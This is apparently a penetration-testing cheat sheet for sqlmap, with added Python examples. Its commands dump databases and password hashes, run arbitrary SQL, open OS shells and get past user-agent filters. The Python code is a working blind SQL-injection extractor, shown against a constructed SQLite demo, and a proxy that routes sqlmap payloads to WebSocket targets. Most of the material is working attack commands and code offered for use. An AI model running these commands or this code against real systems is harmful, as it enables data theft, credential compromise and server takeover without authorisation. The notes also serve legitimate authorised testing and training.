Assess and exploit SQL injection vulnerabilities. Written in Python. Ref: http://www.binarytides.com/sqlmap-hacking-tutorial
NOT ALLOWED DURING THE OSCP EXAM
Upgrade SQLmap
apt install --only-upgrade sqlmap
Help
sqlmap -h
sqlmap -hh
--technique="BEUSTQ"
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
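What the "B" (boolean-based blind) technique actually does, as an added example that is not part of this page or of sqlmap's own code: a constructed SQLite-backed lookup that concatenates user input into its query (standing in for section.php?id=), a yes/no oracle built on top of it, and an extractor that recovers a string one character at a time by binary-searching each code point, seven requests per character. The table, rows, column names and query are invented for the demo; sqlmap automates the same loop against a real HTTP parameter and also handles the encoding, error and timing variants.

```python
import sqlite3

# Constructed demo target: stands in for section.php?id=<value>. Table, rows and
# query are made up for this example.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users(username, password) VALUES ('admin', 's3cret'), ('joe', 'joe123');
""")
REQUESTS = {"count": 0}   # how many "HTTP requests" the oracle has made


def vulnerable_lookup(user_id: str) -> bool:
    """Vulnerable page: the input is concatenated into SQL. True if a row is shown."""
    REQUESTS["count"] += 1
    sql = "SELECT username FROM users WHERE id = " + user_id
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False            # errors are not leaked: the page is simply empty


def safe_lookup(user_id: str) -> bool:
    """Same lookup with a bound parameter: input can never change the query structure."""
    row = _db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def oracle(condition: str) -> bool:
    """Ask one yes/no question: AND the condition onto a row known to exist (id = 1)."""
    return vulnerable_lookup(f"1 AND ({condition})")


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Recover the (ASCII) result of SQL expression `expr` one character at a time.

    Each code point is found by binary search over 0..127, i.e. exactly 7 oracle calls
    per character instead of up to 127 with a linear scan. In SQLite unicode('') is NULL,
    so once the string ends every comparison is false and the search converges on 0.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    secret = blind_extract("SELECT password FROM users WHERE username = 'admin'")
    print("blind extraction:", secret)
    print("oracle requests used:", REQUESTS["count"])
    print("same payload against the parameterised lookup:", safe_lookup("1 AND (1=1)"))
```

Each recovered character costs seven round trips, which is why a blind dump of a large table is slow and why sqlmap prefers the union ("U") or error ("E") techniques whenever the page allows them; the bound-parameter version of the lookup shows the fix at the application side.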
--dbms= (optional: sqlmap fingerprints the back-end itself, but naming it skips the tests for every other DBMS)
mssql for Microsoft SQL Server
mysql for MySQL
oracle for Oracle
pgsql for PostgreSQL
sqlite for SQLite
access for Microsoft Access
firebird for Firebird
sybase for Sybase
maxdb for MaxDB
db2 for IBM DB2
hsql for HSQLDB
informix for Informix
teradata for Teradata
For penetration tests where extracting customer data is not allowed, use --banner: it only retrieves the DBMS version banner, which is enough to prove the injection.
Specify injection points
You can use an asterisk (*) to mark the injection point.
sqlmap -u "http://www.example.com/index.php?id=1" --data="POST_STRING_HERE*" --dbs
For URLs that are not in the form "param=value", sqlmap cannot know on its own where to inject. In such cases the injection point must be marked with a "*" (custom injection marker). For example:
URL="http://x.x.x.x/class_name/method/43*/80"
In a JSON body from a request file (-r), mark the field to test:
POST /someapi
...
{"name":"joe", "email":"*"}
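The marker and request-file conventions above, as an added Python example (not sqlmap's own code): a helper that sets the chosen JSON field to the "*" marker (dotted paths for nested objects, and an error rather than a silently unmarked request if the field does not exist) and one that writes out the raw HTTP request that -r expects, with CRLF line endings and a Content-Length that matches the body. The host, path and body are made up.

```python
import json


def mark_injection_point(body: str, field_path: str) -> str:
    """Return the JSON body with the field at `field_path` replaced by sqlmap's '*' marker.

    `field_path` is dotted for nested objects, e.g. "user.email". Raises KeyError when the
    path does not exist, so a typo cannot produce a request file without any marker.
    """
    obj = json.loads(body)
    node = obj
    *parents, leaf = field_path.split(".")
    for key in parents:
        node = node[key]
    if leaf not in node:
        raise KeyError(field_path)
    node[leaf] = "*"
    return json.dumps(obj, separators=(",", ":"))


def build_request_file(method: str, path: str, host: str, body: str = "", headers=None) -> str:
    """Raw HTTP/1.1 request text for `sqlmap -r FILE`.

    Content-Length matches the body so the request is valid as written; sqlmap rewrites
    the body and the length for every payload it sends.
    """
    hdrs = {"Host": host}
    if body:
        hdrs["Content-Type"] = "application/json"
        hdrs["Content-Length"] = str(len(body.encode("utf-8")))
    hdrs.update(headers or {})
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


if __name__ == "__main__":
    # Constructed request: the host, path and JSON are made up for the example.
    marked = mark_injection_point('{"name":"joe","email":"joe@example.com"}', "email")
    with open("burp_request.txt", "w", newline="") as f:
        f.write(build_request_file("POST", "/someapi", "x.x.x.x", marked))
    # then: sqlmap -r burp_request.txt --dbs
```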
Troubleshooting
# -v 6: highest verbosity, prints every HTTP request and response
sqlmap -v 6 ...
# Route the traffic through Burp (or another intercepting proxy) to see exactly what is sent
sqlmap --proxy http://127.0.0.1:8080 ...
HTTP POST/PUT
For HTTPS, add option --force-ssl
- --data : POST request body, parameters with values
- -p : parameters that sqlmap will try to inject. CAN BE A COOKIE NAME (a parameter named with -p is tested whatever the --level; otherwise cookies are only tested from --level 2 and User-Agent/Referer from --level 3).
- --level=5 --risk=3 : the most thorough test set. Risk 3 adds OR-based payloads that can alter data if the injection lands inside an UPDATE or DELETE, so stay at --risk 2 or lower against production data.
URL="http://x.x.x.x/login.php"
COOKIES="cookie1=value1; cookie2=value2"
sqlmap -u $URL --data="username=admin&password=foo&login=submit" -p username,password --dbms=mysql --cookie="$COOKIES" --level=5 --risk=3
sqlmap --method=PUT ...
HTTP GET
For HTTPS, add option --force-ssl
- -p : parameters that sqlmap will try to inject. CAN BE A COOKIE NAME.
URL="http://x.x.x.x/?cat=1"
COOKIES="cookie1=value1; cookie2=value2"
# --passwords: Enumerate DBMS users password hashes
sqlmap -u $URL --dbms=MySQL --cookie="$COOKIES" -p cat --level=5 --risk=3 --passwords
URL="http://x.x.x.x/?param1=1&param2=2"
sqlmap -u $URL --ignore-proxy --force-ssl -H "Header1: value1" -p param1,param2 --level=5 --risk=3 --banner
# Test for SQL injection on the start URL and on the pages found by crawling one link deep (--crawl=1)
URL="http://x.x.x.x/admin"
sqlmap -u $URL --crawl=1
Inject in cookies
sqlmap -u $URL --dbms=MySQL --cookie="cookie1=*" -p cookie1 --users --passwords
Do not use results from previous sessions
sqlmap --flush-session ...
Using a request file
Copy/Paste a request from Burp Suite into a file.
FILE=~/Documents/burp_request.txt
# List all databases
sqlmap -r $FILE --dbs
Logs
Output (the log file, the session database and dumped data as .csv files under dump/<db>/) is written to
/home/kali/.local/share/sqlmap/output/<target hostname>
Other examples
#-------------------------------------------------------------------------------
# VARIABLES
#-------------------------------------------------------------------------------
DIR="/root/Documents"
URL="http://x.x.x.x/admin"
DB="owasp10"
TABLE="users"
QUERY="SELECT * from ..."
#-------------------------------------------------------------------------------
# *** TO COMPLETE
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/owaspbricks/login-1/index.php"
sqlmap -u $URL --dbms=MySQL --level=5 --risk=3 --passwords
#-------------------------------------------------------------------------------
# Check whether the input parameters are vulnerable to SQL injection
#-------------------------------------------------------------------------------
# sqlmap needs at least one testable parameter: a GET/POST parameter, a cookie or header named with -p, or a "*" marker.
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL
#-------------------------------------------------------------------------------
# List all databases
#-------------------------------------------------------------------------------
sqlmap -u $URL --dbs
sqlmap -r $FILE --dbs
#-------------------------------------------------------------------------------
# Find tables in a particular database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --tables -D $DB
sqlmap -r $FILE --tables -D $DB
#-------------------------------------------------------------------------------
# Get columns of a table
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --columns -D $DB -T $TABLE
#-------------------------------------------------------------------------------
# Get data from a table and display the content.
# sqlmap also writes the dumped data to a .csv file for easy analysis.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --dump -D $DB -T $TABLE
sqlmap -r $FILE --dump -D $DB -T $TABLE
#-------------------------------------------------------------------------------
# Dump the database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --dbms=mysql --dump --threads=7
sqlmap -r request.txt -p muser,mpass --dbms=mysql --dump
request.txt: contains request copy/pasted from Burp
#-------------------------------------------------------------------------------
# Execute arbitrary sql queries
#-------------------------------------------------------------------------------
# Things of interest would be to create a user in the users table or something similar,
# or to change/modify the content of CMS pages etc.
# Note: non-SELECT statements (INSERT/UPDATE/DELETE) only run when the injection supports stacked queries (technique S).
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-query "$QUERY"
#-------------------------------------------------------------------------------
# Execute arbitrary sql queries with a SQL shell. Gives an sql shell like interface to run queries interactively.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-shell
#-------------------------------------------------------------------------------
# Try to get a shell on the remote system; this has many limitations of its own.
#-------------------------------------------------------------------------------
# It is possible to run arbitrary commands on the database server's underlying operating
# system when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the session
# user has the privileges needed to abuse DBMS-specific functionality (MySQL: FILE privilege
# and a writable web root, or UDF injection; PostgreSQL: superuser for UDFs; MSSQL: xp_cmdshell).
--os-shell
#-------------------------------------------------------------------------------
# Sometimes sqlmap is unable to connect to the URL at all. This is visible when it gets stuck at the first task, "testing connection to the target URL". Use this option to make sqlmap send a valid User-Agent like the ones sent by a browser such as Chrome or Firefox (some servers and WAFs reject sqlmap's default User-Agent).
#-------------------------------------------------------------------------------
--random-agent
#-------------------------------------------------------------------------------
# When a form submits data through the POST method, sqlmap has to be given the POST body:
#-------------------------------------------------------------------------------
--data
Websockets
sqlmap has no native WebSocket support: this returns no errors but does not work. See this post.
sqlmap -u "ws://example.com:1234/?id=123" -p "id" --dbs
See Hack the Box (HTB) – Soccer.
Start an HTTP Proxy with sqlmap-websocket-proxy
HTTP Proxy for using sqlmap against websockets, see Official Documentation.
sudo pip3 install sqlmap-websocket-proxy
sqlmap-websocket-proxy
usage: sqlmap-websocket-proxy [-h] -u URL -p PAYLOAD [-o PORT] [--json]
sqlmap-websocket-proxy -u example.com:1234 -p '{"id":"%param%"}' --json
Run SQLmap as usual but proxied via localhost:8080.
sqlmap -u "http://localhost:8080/?id=1" -p id --dbms=mysql
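How the proxy trick works, as an added Python example (not sqlmap-websocket-proxy's own code): a small HTTP server that sqlmap talks to as if the target were a normal web app, which turns each GET /?id=<payload> into one WebSocket message built from a template of the same shape as the -p argument above, and returns the WebSocket reply as the HTTP body. The template, parameter name, ws://example.com:1234/ URL and the echo backend are constructed for the example; the real sender needs the websocket-client package, while the echo backend lets the proxy be exercised offline.

```python
import functools
import json
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Template in the same shape as sqlmap-websocket-proxy's -p argument; the value sqlmap
# sends for the HTTP parameter replaces %param%. Both are assumptions for this example.
TEMPLATE = '{"id":"%param%"}'
PARAM = "id"


def build_ws_message(template: str, value: str) -> str:
    """Substitute sqlmap's payload into the template.

    A quoted placeholder is replaced by a JSON-encoded string, so payloads full of quotes
    and backslashes still reach the server as valid JSON and decode back to the exact payload.
    An unquoted placeholder (numeric field) is substituted verbatim.
    """
    if '"%param%"' in template:
        return template.replace('"%param%"', json.dumps(value))
    return template.replace("%param%", value)


class SqlmapToWsHandler(BaseHTTPRequestHandler):
    """HTTP front door for sqlmap: GET /?id=<payload> -> one WebSocket message -> reply as body."""

    def __init__(self, *args, ws_send, **kwargs):
        self.ws_send = ws_send          # callable(message) -> reply; must be set before handle() runs
        super().__init__(*args, **kwargs)

    def do_GET(self):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query, keep_blank_values=True)
        value = query.get(PARAM, [""])[0]
        body = self.ws_send(build_ws_message(TEMPLATE, value)).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # sqlmap makes thousands of requests; keep stdout quiet
        pass


def real_ws_sender(ws_url: str):
    """Sender that relays one message over a real WebSocket (pip install websocket-client)."""
    def send(message: str) -> str:
        from websocket import create_connection
        ws = create_connection(ws_url)
        try:
            ws.send(message)
            return ws.recv()
        finally:
            ws.close()
    return send


def echo_backend(message: str) -> str:
    """Constructed stand-in for the target's WebSocket server: reports the id it decoded."""
    return json.dumps({"received": json.loads(message)["id"]})


def serve(ws_send, port: int = 8080) -> HTTPServer:
    """Start the proxy in a background thread and return the server (port 0 = any free port)."""
    handler = functools.partial(SqlmapToWsHandler, ws_send=ws_send)
    httpd = HTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def roundtrip(value: str, ws_send=echo_backend) -> dict:
    """Push one value through a temporary proxy instance, as sqlmap would, and return the JSON reply."""
    httpd = serve(ws_send, port=0)
    try:
        url = f"http://127.0.0.1:{httpd.server_address[1]}/?{PARAM}=" + urllib.parse.quote(value, safe="")
        opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # like sqlmap --ignore-proxy
        with opener.open(url, timeout=5) as resp:
            return json.loads(resp.read().decode("utf-8"))
    finally:
        httpd.shutdown()
        httpd.server_close()


if __name__ == "__main__":
    # Point the proxy at the real endpoint (assumed URL), then run:
    #   sqlmap -u "http://127.0.0.1:8080/?id=1" -p id --dbms=mysql
    serve(real_ws_sender("ws://example.com:1234/"), port=8080)
    print("proxy listening on http://127.0.0.1:8080/?id=1")
    threading.Event().wait()          # keep the main thread alive
```

Because the proxy JSON-encodes the payload, a value such as 1' OR '1'='1 arrives at the WebSocket server as exactly that string after the server's own json decode, so the injection lands in the back-end query rather than breaking the message framing; whatever the server replies becomes the page body that sqlmap compares across requests.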